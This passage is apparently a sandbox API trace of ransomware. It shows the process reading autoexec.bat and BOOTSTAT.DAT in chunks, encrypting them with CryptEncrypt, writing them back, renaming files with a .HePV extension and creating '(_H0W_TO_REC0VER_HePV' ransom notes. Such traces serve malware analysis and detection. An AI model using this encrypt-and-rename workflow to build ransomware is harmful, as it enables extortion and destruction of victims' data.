CryptDestroyHash (hHash=0x29fed0) returned 1 [0045.398] CreateFileW (lpFileName="c:\\autoexec.bat" (normalized: "c:\\autoexec.bat"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0045.398] CreateFileW (lpFileName="c:\\autoexec.bat" (normalized: "c:\\autoexec.bat"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0045.398] ReadFile (in: hFile=0xc4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x18, lpOverlapped=0x0) returned 1 [0045.400] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x18, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x20) returned 1 [0045.401] WriteFile (in: hFile=0xb8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x20, lpOverlapped=0x0) returned 1 [0045.401] CloseHandle (hObject=0xc4) returned 1 [0045.402] CloseHandle (hObject=0xb8) returned 1 [0045.403] GetCurrentThreadId () returned 0xa48 [0045.403] GetCurrentThreadId () returned 0xa48 [0045.403] MoveFileW (lpExistingFileName="c:\\autoexec.bat" (normalized: "c:\\autoexec.bat"), lpNewFileName="c:\\autoexec.bat.HePV" (normalized: "c:\\autoexec.bat.hepv")) returned 1 [0045.404] CreateFileW (lpFileName="c:\\(_H0W_TO_REC0VER_HePV.txt" (normalized: "c:\\(_h0w_to_rec0ver_hepv.txt"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0045.406] CloseHandle (hObject=0xb8) returned 1 [0045.407] CreateFileW (lpFileName="c:\\(_H0W_TO_REC0VER_HePV.html" (normalized: "c:\\(_h0w_to_rec0ver_hepv.html"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0045.409] CloseHandle (hObject=0xb8) returned 1 [0045.410] CreateFileW (lpFileName="c:\\(_H0W_TO_REC0VER_HePV.url" (normalized: "c:\\(_h0w_to_rec0ver_hepv.url"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0045.412] CloseHandle (hObject=0xb8) returned 1 [0045.413] CreateFileW (lpFileName="c:\\boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0045.414] CloseHandle (hObject=0xffffffff) returned 0 [0045.414] CreateFileW (lpFileName="c:\\boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0045.414] CreateFileW (lpFileName="c:\\boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0045.414] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.417] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.417] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.417] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.417] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.417] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.417] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.417] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.417] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.418] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.418] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.418] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.418] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.418] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.418] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.418] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.418] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.418] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.418] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.418] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.418] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.419] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.419] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.419] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.419] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.419] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.419] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.419] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.419] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.419] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.419] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.420] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.420] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.420] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.420] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.420] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.420] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.420] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.420] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.420] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.420] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.420] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.420] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.421] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.421] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.421] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.421] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.421] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.421] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.421] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.421] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.421] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.422] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.422] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.422] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.422] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.422] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.422] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.422] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.422] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.422] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.422] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.422] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.422] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.422] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.422] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.422] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.423] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.423] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.423] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.423] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.423] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.423] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.423] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.423] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.423] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.423] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.423] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.423] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.423] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.423] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.423] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.424] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.424] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.424] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.424] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.424] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.424] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.424] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.424] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.424] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.424] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) 